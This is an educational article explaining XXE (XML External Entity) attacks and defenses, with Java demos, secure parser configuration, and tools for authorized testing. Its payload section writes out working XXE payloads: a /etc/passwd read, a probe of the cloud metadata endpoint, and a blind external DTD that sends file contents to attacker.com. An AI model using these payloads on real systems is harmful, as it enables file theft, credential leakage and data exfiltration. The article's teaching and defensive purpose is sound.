XML External Entity Explained: Attack & Defense Guide

In this entry of the Vulnerability Explain series we are tackling XML External Entity injection, or XXE. It is a classic that still shows up in modern apps wherever XML, SOAP, SVG, or office documents are parsed. We will cover what XXE is, how it lets attackers read files and reach internal systems, how to test for it safely, and how to lock your parsers down.

What is XXE?

XXE is a vulnerability in how an application parses XML. The XML standard supports a feature called external entities, which let a document pull in content from an outside source. If the parser processes attacker-controlled XML with that feature enabled, the attacker can define entities that read local files or make network requests.

Think of it like leaving a fill-in-the-blank form where one of the blanks says “insert the contents of this file here.” A poorly configured parser will obediently do exactly that, even if the file is /etc/passwd.

How does XXE work?

XXE works by abusing the document type definition (DTD) and entity features of XML. The path from a friendly XML upload to a full breach usually looks like this:

XML Input Accepted
- The application accepts XML from a user – an API body, a file upload, a SOAP message, or an SVG image.
Parser Allows External Entities
- The XML parser is left in its default or misconfigured state where DTDs and external entities are resolved.
Malicious Entity Defined
- The attacker declares an external entity that points at a local file (file://) or a remote URL (http://).
Entity Resolution
- When the parser expands the entity, it reads the targeted file or sends the request and places the result into the document.
Data Exfiltration or SSRF
- The attacker reads the reflected file contents, or uses out-of-band channels and internal URLs to pivot into the network – effectively turning XXE into SSRF.

So XXE is really about a parser trusting instructions hidden inside the data it was asked to read. Disable those instructions and the attack disappears.
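
The steps above can be reproduced harmlessly on your own machine. The sketch below is illustrative only: the class and method names (`XxeResolutionDemo`, `parseWithDefaults`, `readViaEntity`) are hypothetical, and it assumes the JDK's built-in parser with its historical defaults, under which an unconfigured `DocumentBuilderFactory` resolves external entities. It writes a temporary file and then reads it back through an entity, standing in for the attacker's `file://` target.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical demo class; not part of any library.
final class XxeResolutionDemo {

    // Parses XML with an unconfigured factory, as a vulnerable application might,
    // and returns the text content of the root element.
    static String parseWithDefaults(String xml) {
        try {
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            DocumentBuilder db = dbf.newDocumentBuilder();
            Document doc = db.parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getDocumentElement().getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    // Writes `secret` to a temp file, then builds a document whose external
    // entity points at that file and returns whatever the parser expanded.
    static String readViaEntity(String secret) {
        try {
            Path file = Files.createTempFile("xxe-demo", ".txt");
            try {
                Files.writeString(file, secret);
                String xml = "<?xml version=\"1.0\"?>"
                        + "<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"" + file.toUri() + "\"> ]>"
                        + "<data>&xxe;</data>";
                return parseWithDefaults(xml);
            } finally {
                Files.deleteIfExists(file);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(readViaEntity("demo-secret"));
    }
}
```

If the parser behaves as assumed, the value returned is the file's content rather than the literal `&xxe;`, which is the whole vulnerability in miniature.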

How XXE works: a malicious external entity makes the XML parser read local files or internal services.

Tools and Techniques for XXE Testing

XXE testing blends careful payload crafting with tooling that helps with blind and out-of-band cases where the response does not echo your data back.

Manual Testing Methodologies

In-Band File Read – Inject an external entity pointing at a known file and check whether its contents appear in the response.
Blind / Out-of-Band Testing – When nothing is reflected, use an external DTD hosted on your server to force the parser to call back to you.
Content-Type Switching – Some JSON endpoints also accept XML when you change the Content-Type header to application/xml or text/xml, because the framework picks its deserializer from that header; always try it.
File Format Abuse – Embed XXE payloads inside SVG, DOCX, XLSX, or SAML messages, which are XML under the hood.
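
As a rough sketch of the Content-Type switching check, the Java snippet below builds (but does not send) a request that re-submits to a JSON endpoint as XML. The class name `ContentTypeSwitch`, the marker string `xxe-probe-ok`, and the example URL in `main` are all hypothetical. The probe deliberately uses only an internal entity, so it reads no files and makes no callbacks; if the marker comes back expanded in a response, the endpoint parsed XML with DTDs enabled and deserves closer, authorized testing.

```java
import java.net.URI;
import java.net.http.HttpRequest;

// Hypothetical helper for authorized testing; not part of any scanner.
final class ContentTypeSwitch {

    // Harmless probe: an internal entity only, so nothing is read or fetched.
    static final String PROBE_XML =
            "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE data [ <!ENTITY probe \"xxe-probe-ok\"> ]>"
            + "<data>&probe;</data>";

    // Builds the XML variant of a request that would normally carry JSON.
    static HttpRequest xmlVariant(URI endpoint) {
        return HttpRequest.newBuilder(endpoint)
                .header("Content-Type", "application/xml")
                .POST(HttpRequest.BodyPublishers.ofString(PROBE_XML))
                .build();
    }

    public static void main(String[] args) {
        // Placeholder URL; substitute an endpoint you are authorized to test.
        HttpRequest request = xmlVariant(URI.create("https://target.example/api/items"));
        System.out.println(request.method() + " " + request.uri() + " " + request.headers().map());
    }
}
```

Sending the request is left to whatever HTTP client or proxy you already use for testing.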

Automated Scanning Tools

Burp Suite Scanner – Detects in-band and out-of-band XXE, and its Collaborator service is ideal for blind cases.
Nuclei – Template-driven scanner with community XXE templates for fast triage.
XXEinjector – Automates retrieval of files and out-of-band exploitation using various protocols.
oxml_xxe – Helps embed XXE payloads inside office and image file formats.

XXE Protection Mechanisms

Best Practices for Secure Coding

Disable DTDs and External Entities
- Description: Turn off DOCTYPE declarations and external entity resolution in your XML parser.
- Benefits: This single change eliminates the vast majority of XXE.
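- Implementation Tip: In Java, set XMLConstants.FEATURE_SECURE_PROCESSING and set the disallow-doctype-decl feature to true; in .NET, set XmlResolver to null and DtdProcessing to Prohibit; in PHP, do not pass LIBXML_NOENT or LIBXML_DTDLOAD when parsing untrusted input, and on versions before 8.0 call libxml_disable_entity_loader(true).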
Use Safe Parsers and Data Formats
- Description: Prefer JSON where possible, and use parser libraries that are secure by default.
- Benefits: Reduces the attack surface and removes legacy entity behavior.
- Implementation Tip: Keep parser libraries patched and updated.
Validate and Whitelist Input
- Description: Validate uploaded files against an expected schema before full processing.
- Benefits: Catches malformed or hostile documents early.
- Implementation Tip: Reject any document containing a DOCTYPE if your schema does not need one.
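
The same hardening applies to streaming parsers. Below is a minimal sketch for StAX, assuming the JDK's built-in `XMLInputFactory`; the class and method names (`HardenedStax`, `textOrNull`, `leaks`) are hypothetical. It switches off DTD support and external entities, then checks that a document whose entity points at a temporary file no longer exposes that file's content.

```java
import java.io.IOException;
import java.io.StringReader;
import java.io.UncheckedIOException;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

// Hypothetical helper class; not part of any library.
final class HardenedStax {

    // StAX factory with DTD support and external entities switched off.
    static XMLInputFactory newFactory() {
        XMLInputFactory factory = XMLInputFactory.newInstance();
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return factory;
    }

    // Returns the concatenated character data, or null if the parser
    // rejected the document.
    static String textOrNull(String xml) {
        try {
            XMLStreamReader reader = newFactory().createXMLStreamReader(new StringReader(xml));
            StringBuilder text = new StringBuilder();
            while (reader.hasNext()) {
                if (reader.next() == XMLStreamConstants.CHARACTERS) {
                    text.append(reader.getText());
                }
            }
            reader.close();
            return text.toString();
        } catch (XMLStreamException e) {
            return null;
        }
    }

    // Self-check: true only if a file's content leaks through an external entity.
    static boolean leaks(String secret) {
        try {
            Path file = Files.createTempFile("stax-demo", ".txt");
            try {
                Files.writeString(file, secret);
                String xml = "<?xml version=\"1.0\"?>"
                        + "<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"" + file.toUri() + "\"> ]>"
                        + "<data>&xxe;</data>";
                String text = textOrNull(xml);
                return text != null && text.contains(secret);
            } finally {
                Files.deleteIfExists(file);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }
}
```

Ordinary documents such as `<data>hello</data>` still parse as before; only documents that depend on DTD-declared entities are affected.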

Best Practices for Organizations

Secure Defaults Across Services
- Create a hardened XML parsing library or wrapper that every team must use.
- Ban raw use of default parser configurations in code review.
Network Egress Controls
- Restrict outbound traffic from application servers so blind XXE cannot reach the internet.
- Block access to cloud metadata endpoints from app tiers.
Continuous Testing
- Add XXE checks to SAST and DAST pipelines.
- Re-test any feature that newly accepts XML or office documents.
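
One way the shared wrapper idea might look in Java is sketched below. The class name `SafeXml` and its methods are hypothetical, and the feature URIs are the ones supported by the JDK's built-in Xerces-based parser; other parser implementations may need different settings. The wrapper fails closed: if the parser cannot apply a hardening feature, nothing is parsed.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

// Hypothetical organization-wide wrapper; teams call SafeXml.parse(...)
// instead of configuring DocumentBuilderFactory themselves.
final class SafeXml {
    private SafeXml() {}

    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Reject any document that carries a DOCTYPE declaration.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth in case DOCTYPE is ever re-enabled.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    static Document parse(InputStream in) throws SAXException, IOException {
        try {
            return hardenedFactory().newDocumentBuilder().parse(in);
        } catch (ParserConfigurationException e) {
            // Fail closed when a hardening feature is unsupported.
            throw new IllegalStateException("XML parser cannot be hardened", e);
        }
    }

    // Convenience check: true if the hardened parser accepts the document.
    static boolean accepts(String xml) {
        try {
            parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return true;
        } catch (SAXException e) {
            return false;
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }
}
```

With a single entry point like this, code review only has to flag direct calls to `DocumentBuilderFactory.newInstance()` outside the wrapper.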

Top XXE Payloads Used by Security Researchers

As a security researcher, knowing the most common payloads helps you detect and prevent these attacks. Use this knowledge ethically and only on systems you are authorized to test. Some sample payloads are shown below.

<!-- Classic in-band file read -->
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>

<!-- SSRF / internal port and metadata access (the address shown is the AWS-style instance metadata endpoint) -->
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<data>&xxe;</data>

<!-- Blind XXE via external DTD -->
<!DOCTYPE foo [ <!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd"> %ext; ]>
<foo/>

<!-- evil.dtd hosted by the attacker for out-of-band exfiltration -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval; %exfil;
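
The out-of-band idea behind the blind payloads can be observed entirely on loopback. The following is a sketch under stated assumptions, not a testing tool: `OobCallbackDemo`, `observedCallbacks`, and the `/callback` path are hypothetical names, the listener uses the JDK's `com.sun.net.httpserver.HttpServer`, and the parser is an unconfigured `DocumentBuilderFactory` that is assumed to resolve external entities. The listener plays the role that an attacker-controlled server (or Burp Collaborator) plays in a real test.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.ByteArrayInputStream;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;
import javax.xml.parsers.DocumentBuilderFactory;

// Hypothetical local demo; everything stays on 127.0.0.1.
final class OobCallbackDemo {

    // Starts a loopback listener, parses a document whose entity points at it
    // with an unconfigured parser, and returns the request paths the listener saw.
    static List<String> observedCallbacks() {
        List<String> seen = new CopyOnWriteArrayList<>();
        HttpServer server = null;
        try {
            // Port 0 asks the OS for any free port.
            server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
            server.createContext("/", exchange -> {
                seen.add(exchange.getRequestURI().getPath());
                byte[] body = "pong".getBytes(StandardCharsets.UTF_8);
                exchange.sendResponseHeaders(200, body.length);
                exchange.getResponseBody().write(body);
                exchange.close();
            });
            server.start();
            int port = server.getAddress().getPort();

            String xml = "<?xml version=\"1.0\"?>"
                    + "<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://127.0.0.1:"
                    + port + "/callback\"> ]>"
                    + "<data>&xxe;</data>";
            DocumentBuilderFactory.newInstance().newDocumentBuilder()
                    .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return seen;
        } catch (Exception e) {
            throw new IllegalStateException(e);
        } finally {
            if (server != null) {
                server.stop(0);
            }
        }
    }

    public static void main(String[] args) {
        System.out.println("Paths requested by the parser: " + observedCallbacks());
    }
}
```

A recorded request proves the parser made an outbound connection even when the application's response reveals nothing, which is why blind cases are confirmed by watching the listener rather than the response.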

Real-World Example: Reading Server Files Through a SOAP API

A legacy partner integration exposed a SOAP endpoint that accepted XML invoices. The underlying parser was the platform default, which happily resolved external entities.

A tester submitted an invoice whose DOCTYPE defined an entity pointing at file:///etc/passwd. The server echoed a validation error that included the expanded entity – and with it, the full contents of the file. From there the same technique reached the cloud metadata service and leaked temporary credentials.

Remediation was straightforward once spotted: the team disabled DTD processing in the parser and added egress filtering. XXE is rarely about clever exploitation – it is almost always about a parser that was never told to say no.

Vulnerable and Secure Code for XXE

The following example shows the contrast between vulnerable and secure code for XXE. It helps you see how the flaw creeps into real code and the changes that shut it down.

🥺 Vulnerable Code:

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Vulnerable: default parser resolves external entities
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
// Parses attacker-controlled XML with DTDs and entities enabled
Document doc = db.parse(request.getInputStream());

The factory is left in its default state, so DOCTYPE and external entities are resolved.
An uploaded document can read local files or reach internal services through entities.

😎 Secure Code:

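import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Secure: disable DTDs and external entities
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Any document containing a DOCTYPE is rejected with a parse error
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth: keep external entities off even if DOCTYPE is re-enabled later
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(request.getInputStream());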

Disallowing DOCTYPE declarations blocks XXE in one line, because an entity cannot be declared without a DOCTYPE.
External general and parameter entities are explicitly turned off as defense in depth.

Conclusion

XXE is almost never about clever exploitation – it is about a parser that was never told to say no. The fix is equally direct: disable DTD processing and external entity resolution, prefer safe data formats like JSON, and keep parser libraries patched. Layer on network egress controls so blind XXE cannot phone home, and the vulnerability simply stops working. Treat every place that accepts XML, SVG, or office documents as a parser you must harden before it ever sees user input.
